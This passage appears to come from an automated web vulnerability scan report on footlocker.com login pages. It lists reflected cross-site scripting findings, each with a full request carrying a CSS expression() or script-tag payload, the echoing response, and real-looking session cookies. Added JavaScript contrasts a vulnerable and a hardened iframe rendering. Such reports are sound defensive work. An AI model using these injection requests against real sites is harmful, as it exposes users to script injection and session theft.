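    ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' })[c]);
}

// Hardened rendering: percent-encode the value so it stays one query component,
// then entity-encode the whole URL so it stays one attribute value.
function renderIframeHardened(bvAAEnabled) {
  const url = LOGIN_FORM + encodeURIComponent(bvAAEnabled) + '&dontRunBV=true';
  return '<iframe src="' + escapeHtmlAttr(url) + '"' +
         ' width="250" height="185" frameborder="0" scrolling="no"></iframe>';
}

// Attribute names a browser's tokenizer sees on the first start tag in `markup`.
// Simplified HTML tokenizer rules: a name runs until whitespace, '=', '/' or '>';
// a value is either quoted or runs until whitespace or '>'.
function attributeNames(markup) {
  const names = [];
  const ws = c => /\s/.test(c);
  let i = 0;
  while (i < markup.length && !ws(markup[i]) && markup[i] !== '>') i++;   // skip '<tagname'
  while (i < markup.length) {
    while (i < markup.length && (ws(markup[i]) || markup[i] === '/')) i++;
    if (i >= markup.length || markup[i] === '>') break;
    let name = '';
    while (i < markup.length && !ws(markup[i]) && !'=/>'.includes(markup[i])) name += markup[i++];
    names.push(name.toLowerCase());
    while (i < markup.length && ws(markup[i])) i++;
    if (markup[i] === '=') {
      i++;
      while (i < markup.length && ws(markup[i])) i++;
      const q = markup[i];
      if (q === '"' || q === "'") {
        i = markup.indexOf(q, i + 1);
        i = i < 0 ? markup.length : i + 1;
      } else {
        while (i < markup.length && !ws(markup[i]) && markup[i] !== '>') i++;
      }
    }
  }
  return names;
}

console.log('vulnerable:', attributeNames(renderIframeVulnerable(PAYLOAD)));
console.log('hardened:  ', attributeNames(renderIframeHardened(PAYLOAD)));
```

The vulnerable render yields a `style` attribute (plus a junk attribute named `362edd0e270&dontrunbv`) that the server never intended; the hardened render yields only `src`, `width`, `height`, `frameborder` and `scrolling`, with the payload surviving as an inert `%22style%3D%22...` substring of the query.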

Request

GET /login/login.cfm?secured=false&bv_RR_enabled=true&bv_AA_enabled=529c3"style%3d"x%3aexpression(alert(1))"362edd0e270&dontRunBV=true HTTP/1.1
Host: www.footlocker.com
Proxy-Connection: keep-alive
Referer: http://www.footlocker.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; SSLC=web07; USER_PROFILE=HSPEqM4qU3DrFgRRbE4xA41L%2FxlKfNqQFH82vg1uFDf78j9GgBKSVG72ux9P9BBD9TNotE%2FuTdY7%0ApgsOVdTPmuf5mHGkQdt%2Fp4QG7ekqXGW%2Bc0%2BRT5CrpIV02E6hdSX61Dc5kPpRmjrov7on6s6li5HE%0AlOQG5YDlPEHH39sa1pRrpC3F25gGPN%2B9AXbwHEZb7MdHE8MV1vwxbOmvVo1eIzUeLfk1WM7eU85U%0AI9k9nJhUP8QjAazzjzcfG7j8i%2FZcdDc6rIzc9KtfsknfcwMpBJgyU6MmKYeBzKCHNiF4nGiiNSnF%0AcO5qGOI%2F1ENBjQbjXaghymu5WCtRYmAA%2FyLJM6SorvFGpkVfhe2sQZVzu3Kglt%2BFhTm8qRZenVT4%0AVbKkKIGY%2BpNyEWDhq79vMwb2kdMXujxgmwUz; BROWSER_SESSION=ralquAXUBpcSoNO65%2FZbRPD%2FAJ%2F1qkUwimcu38BTWxf6OLJJhPFUS2qHovA0PKYQ68EfgqxTfvoM%0ANZstUyOpfmuQYhPsaDqR; TID=5555%2D37151120432137200525561%2D0; cmTPSet=Y; fcspersistslider_click_1=1; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305541986623&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:31 GMT
Connection: close
Set-Cookie: SSLC=web%2D15;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:36:31 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 10:36:31 GMT;path=/
Content-Length: 239


   <iframe src="http://www.footlocker.com/login/login_form.cfm?secured=false&bv_RR_enabled=true&bv_AA_enabled=529c3"style="x:expression(alert(1))"362edd0e270&dontRunBV=true" width="250" height="185" frameborder="0" scrolling="no">
...[SNIP]...

5.57. http://www.footlocker.com/login/login.cfm [bv_RR_enabled parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.footlocker.com
Path:   /login/login.cfm

Issue detail

The value of the bv_RR_enabled request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 327b2"style%3d"x%3aexpression(alert(1))"aca39a4f38b was submitted in the bv_RR_enabled parameter. This input was echoed as 327b2"style="x:expression(alert(1))"aca39a4f38b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /login/login.cfm?secured=false&bv_RR_enabled=327b2"style%3d"x%3aexpression(alert(1))"aca39a4f38b&bv_AA_enabled=true&dontRunBV=true HTTP/1.1
Host: www.footlocker.com
Proxy-Connection: keep-alive
Referer: http://www.footlocker.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; SSLC=web07; USER_PROFILE=HSPEqM4qU3DrFgRRbE4xA41L%2FxlKfNqQFH82vg1uFDf78j9GgBKSVG72ux9P9BBD9TNotE%2FuTdY7%0ApgsOVdTPmuf5mHGkQdt%2Fp4QG7ekqXGW%2Bc0%2BRT5CrpIV02E6hdSX61Dc5kPpRmjrov7on6s6li5HE%0AlOQG5YDlPEHH39sa1pRrpC3F25gGPN%2B9AXbwHEZb7MdHE8MV1vwxbOmvVo1eIzUeLfk1WM7eU85U%0AI9k9nJhUP8QjAazzjzcfG7j8i%2FZcdDc6rIzc9KtfsknfcwMpBJgyU6MmKYeBzKCHNiF4nGiiNSnF%0AcO5qGOI%2F1ENBjQbjXaghymu5WCtRYmAA%2FyLJM6SorvFGpkVfhe2sQZVzu3Kglt%2BFhTm8qRZenVT4%0AVbKkKIGY%2BpNyEWDhq79vMwb2kdMXujxgmwUz; BROWSER_SESSION=ralquAXUBpcSoNO65%2FZbRPD%2FAJ%2F1qkUwimcu38BTWxf6OLJJhPFUS2qHovA0PKYQ68EfgqxTfvoM%0ANZstUyOpfmuQYhPsaDqR; TID=5555%2D37151120432137200525561%2D0; cmTPSet=Y; fcspersistslider_click_1=1; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305541986623&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:30 GMT
Connection: close
Set-Cookie: SSLC=web%2D15;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:36:30 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 10:36:30 GMT;path=/
Content-Length: 239


   <iframe src="http://www.footlocker.com/login/login_form.cfm?secured=false&bv_RR_enabled=327b2"style="x:expression(alert(1))"aca39a4f38b&bv_AA_enabled=true&dontRunBV=true" width="250" height="185" frameborder="0" scrolling="no">
...[SNIP]...

5.58. http://www.footlocker.com/login/login_forgotpassword.cfm [bv_AA_enabled parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.footlocker.com
Path:   /login/login_forgotpassword.cfm

Issue detail

The value of the bv_AA_enabled request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 361dd"style%3d"x%3aexpression(alert(1))"9d00252baee was submitted in the bv_AA_enabled parameter. This input was echoed as 361dd"style="x:expression(alert(1))"9d00252baee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /login/login_forgotpassword.cfm?secured=false&bv_RR_enabled=true&bv_AA_enabled=true361dd"style%3d"x%3aexpression(alert(1))"9d00252baee HTTP/1.1
Host: www.footlocker.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; cmTPSet=Y; fcspersistslider_click_1=1; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305541986623&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910; SSLC=web%2D06; USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib; BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib; TID=5555%2D37151120432137200525561%2D0

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:42 GMT
Connection: close
Set-Cookie: SSLC=web%2D22;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:36:42 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 10:36:42 GMT;path=/
Content-Length: 2836


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<form action="https://www.footlocker.com/login/login_forgotpassword_action.cfm?secured=false&bv_RR_enabled=true&bv_AA_enabled=true361dd"style="x:expression(alert(1))"9d00252baee" method="post">
...[SNIP]...

5.59. http://www.footlocker.com/login/login_form.cfm [%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000121)%3C/script%3E parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.footlocker.com
Path:   /login/login_form.cfm

Issue detail

The value of the %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000121)%3C/script%3E request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 526f0"><script>alert(1)</script>8748cce5433 was submitted in that parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Two details are worth noting. The "parameter name" is a test string from an earlier Netsparker scan that the crawler picked up from a previously visited URL, and the request below contains no "=", so the payload is in fact appended to that name rather than sent as its value. The echoed fragment (</script>526f0"><script>... followed by " VALUE="") is the tail of the parameter name inside the name attribute of a hidden INPUT element, which is the same sink as in 5.61.

Request

GET /login/login_form.cfm?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000121)%3C/script%3E526f0"><script>alert(1)</script>8748cce5433 HTTP/1.1
Host: www.footlocker.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; cmTPSet=Y; fcspersistslider_click_1=1; NewRegistrant=Global Header Log In|Create an Account; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305542003667&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910; SSLC=web%2D22; USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib; BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib; TID=5555%2D37151120432137200525561%2D0

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:58:43 GMT
Connection: close
Set-Cookie: SSLC=web%2D06;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:58:43 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 10:58:43 GMT;path=/
Content-Length: 3661


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
</script>526f0"><script>alert(1)</script>8748cce5433" VALUE="">
...[SNIP]...

5.60. http://www.footlocker.com/login/login_form.cfm [bv_AA_enabled parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.footlocker.com
Path:   /login/login_form.cfm

Issue detail

The value of the bv_AA_enabled request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6784e"style%3d"x%3aexpression(alert(1))"6c3e0589f71 was submitted in the bv_AA_enabled parameter. This input was echoed as 6784e"style="x:expression(alert(1))"6c3e0589f71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /login/login_form.cfm?secured=false&bv_RR_enabled=true&bv_AA_enabled=true6784e"style%3d"x%3aexpression(alert(1))"6c3e0589f71&dontRunBV=true HTTP/1.1
Host: www.footlocker.com
Proxy-Connection: keep-alive
Referer: http://www.footlocker.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; cmTPSet=Y; fcspersistslider_click_1=1; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305541986623&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910; SSLC=web%2D06; USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib; BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib; TID=5555%2D37151120432137200525561%2D0

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:37 GMT
Connection: close
Set-Cookie: SSLC=web%2D15;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:36:37 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 10:36:37 GMT;path=/
Content-Length: 3321


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<form action="https://www.footlocker.com/login/login_action.cfm?secured=false&bv_RR_enabled=true&bv_AA_enabled=true6784e"style="x:expression(alert(1))"6c3e0589f71" method="post" target="_self">
...[SNIP]...

5.61. http://www.footlocker.com/login/login_form.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.footlocker.com
Path:   /login/login_form.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc4cf"><script>alert(1)</script>a937fb8d7fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
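The report's "echoed unmodified" wording comes from checking what the server did to the marked payload. The following is an added reconstruction of that check, written for this page; it is not the scanner's code and not part of the original report. The payload is wrapped in random hex markers (the markers from 5.61) so its reflection can be located exactly, and the bytes between the markers show which metacharacters survived. The three response fragments are constructed: the first is copied from the 5.61 response above, the other two are invented to show a fully encoded and a half-encoded reflection.

```javascript
// Added example (not from the report or any scanner): locate a marked reflection
// and classify what the server did to the probe's metacharacters.

const PREFIX = 'cc4cf';                          // random marker before the probe (from 5.61)
const SUFFIX = 'a937fb8d7fa';                    // random marker after the probe (from 5.61)
const PROBE  = '"><script>alert(1)</script>';    // attribute-breakout probe used in 5.61

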